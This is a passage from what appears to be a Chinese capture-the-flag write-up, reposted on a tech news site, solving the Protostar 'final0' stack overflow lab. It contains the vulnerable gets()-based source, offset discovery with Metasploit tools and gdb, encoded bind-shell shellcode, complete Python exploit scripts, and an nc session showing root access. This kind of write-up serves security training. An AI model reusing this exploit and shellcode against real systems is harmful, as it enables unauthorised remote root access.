Protostar final0 01/15 Update SLTechnology News&Howtos

Protostar final0

2025-01-15 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

Hints: depending on where you are returning to, you may wish to use a toupper() proof shellcode.Source code#include "../ common/common.c"

#define NAME "final0"

#define UID 0

#define GID 0

#define PORT 2995

* Read the username in from the network

char *get_username()

{

char buffer[512];

char *q;

int i;

memset(buffer, 0, sizeof(buffer));

gets(buffer);

/* Strip off trailing new line characters */

q = strchr(buffer, '\n');

if(q) *q = 0;

q = strchr(buffer, '\r');

if(q) *q = 0;

/* Convert to lower case */

for(i = 0; i

< strlen(buffer); i++) { buffer[i] = toupper(buffer[i]); } /* Duplicate the string and return it */ return strdup(buffer); } int main(int argc, char **argv, char **envp) { int fd; char *username; /* Run the process as a daemon */ background_process(NAME, UID, GID); /* Wait for socket activity and return */ fd = serve_forever(PORT); /* Set the client socket to STDIN, STDOUT, and STDERR */ set_io(fd); username = get_username(); printf("No such user %s\n", username); } 终于来到Final了 T T 。。。从题目的提示知道利用stack溢出，而且题中的buffer只开辟了512个字节，因此可以通过溢出修改ret的地址跳到我们定义的shellcode中去。那如何找到ret的地址呢？请看步骤：root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_create.rb 50 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab #!/usr/bin/python from socket import * from struct import * s = socket(AF_INET, SOCK_STREAM) s.connect(("192.168.0.71", 2995)) buffer = "a"*512 exc = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab" s.send(buffer+exc) 接着在客户端运行一下，通过用gdb查看/tmp下面的调试文件信息即可得到真正的RET地址：root@protostar:/# gdb --quiet --core=/tmp/core.11.final0.2036 Core was generated by `/opt/protostar/bin/final0'. Program terminated with signal 11, Segmentation fault. #0 0x37614136 in ?? () root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb 0x37614136 [*] Exact match at offset 20 得到RET的位置在buffer的512+20的位置。需要确认的话则将buffer="a"*532+"\xef\xbe\xad\xde"发送过去，则在调试文件中将提示地址为0xdeadbeef出错。在此就不确认了，偷懒一下。。。接下来需要一个shellcode，用msfpayload生成即可：root@bt:~/Desktop/shellcode# msfpayload linux/x86/shell_bind_tcp R | msfencode -b '\x00\xff\x0d\x0a' -e x86/shikata_ga_nai -t c [*] x86/shikata_ga_nai succeeded with size 105 (iteration=1) unsigned char buf[] = "\xba\x5f\x74\xd6\x3c\xdb\xcd\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" "\x14\x31\x56\x14\x03\x56\x14\x83\xc6\x04\xbd\x81\xe7\xe7\xb6" "\x89\x5b\x5b\x6b\x24\x5e\xd2\x6a\x08\x38\x29\xec\x32\x9b\xe3" "\x84\xc6\x23\x15\x08\xad\x33\x44\xe0\xb8\xd5\x0c\x66\xe3\xd8" "\x51\xef\x52\xe7\xe2\xeb\xe4\x81\xc9\x73\x47\xfe\xb4\xbe\xc8" "\x6d\x61\x2a\xf6\xc9\x5f\x2a\x41\x93\xa7\x42\x7d\x4c\x2b\xfa" "\xe9\xbd\xa9\x93\x87\x48\xce\x33\x0b\xc2\xf0\x03\xa0\x19\x72"; 现将shellcode接在RET位置之后，通过查看调试文件需要找到shellcode的地址 #!/usr/bin/python from socket import * from struct import * s = socket(AF_INET, SOCK_STREAM) s.connect(("192.168.0.71", 2995)) buffer = "a"*532 ret = "\xEF\xBE\xAD\xDE" nop = "\x90"*20 #msfpayload linux/x86/shell_bind_tcp R | msfencode -b '\x00\xff\x0d\x0a' -e x86/shikata_ga_nai -t c shellcode = "\xba\x5f\x74\xd6\x3c\xdb\xcd\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"\ "\x14\x31\x56\x14\x03\x56\x14\x83\xc6\x04\xbd\x81\xe7\xe7\xb6"\ "\x89\x5b\x5b\x6b\x24\x5e\xd2\x6a\x08\x38\x29\xec\x32\x9b\xe3"\ "\x84\xc6\x23\x15\x08\xad\x33\x44\xe0\xb8\xd5\x0c\x66\xe3\xd8"\ "\x51\xef\x52\xe7\xe2\xeb\xe4\x81\xc9\x73\x47\xfe\xb4\xbe\xc8"\ "\x6d\x61\x2a\xf6\xc9\x5f\x2a\x41\x93\xa7\x42\x7d\x4c\x2b\xfa"\ "\xe9\xbd\xa9\x93\x87\x48\xce\x33\x0b\xc2\xf0\x03\xa0\x19\x72" s.send(buffer + ret + nop + shellcode) 在/tmp文件夹下查看gdb文件： root@protostar:/# gdb --quiet --core=/tmp/core.11.final0.2052 Core was generated by `/opt/protostar/bin/final0'. Program terminated with signal 11, Segmentation fault. #0 0xdeadbeef in ?? () (gdb) x/100x 0xbffffc00 0xbffffc00: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc10: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc20: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc30: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc40: 0x41414141 0x41414141 0x00000000 0x00000200 0xbffffc50: 0x61616161 0x61616161 0x61616161 0xdeadbeef 0xbffffc60: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffc70: 0x90909090 0xd6745fba 0xd9cddb3c 0x5ef42474 0xbffffc80: 0x14b1c931 0x03145631 0xc6831456 0xe781bd04 0xbffffc90: 0x5b89b6e7 0x5e246b5b 0x38086ad2 0x9b32ec29 0xbffffca0: 0x23c684e3 0x33ad0815 0xd5b8e044 0xd8e3660c 0xbffffcb0: 0xe752ef51 0x81e4ebe2 0xfe4773c9 0x6dc8beb4 得到目标地址是0xbffffc60现在RET的位置有了，shellcode的地址也有了，只欠东风了。。 #!/usr/bin/python from socket import * from struct import * s = socket(AF_INET, SOCK_STREAM) s.connect(("192.168.0.71", 2995)) buffer = "a"*532 ret = "\x60\xfc\xff\xbf" nop = "\x90"*20 #msfpayload linux/x86/shell_bind_tcp R | msfencode -b '\x00\xff\x0d\x0a' -e x86/shikata_ga_nai -t c shellcode = "\xba\x5f\x74\xd6\x3c\xdb\xcd\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"\ "\x14\x31\x56\x14\x03\x56\x14\x83\xc6\x04\xbd\x81\xe7\xe7\xb6"\ "\x89\x5b\x5b\x6b\x24\x5e\xd2\x6a\x08\x38\x29\xec\x32\x9b\xe3"\ "\x84\xc6\x23\x15\x08\xad\x33\x44\xe0\xb8\xd5\x0c\x66\xe3\xd8"\ "\x51\xef\x52\xe7\xe2\xeb\xe4\x81\xc9\x73\x47\xfe\xb4\xbe\xc8"\ "\x6d\x61\x2a\xf6\xc9\x5f\x2a\x41\x93\xa7\x42\x7d\x4c\x2b\xfa"\ "\xe9\xbd\xa9\x93\x87\x48\xce\x33\x0b\xc2\xf0\x03\xa0\x19\x72" s.send(buffer + ret + nop + shellcode) 用另一个客户端连接4444端口（默认） D:\>

nc 192.168.0.71 4444

uid=0(root) gid=0(root) groups=0(root)

whoami

root

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.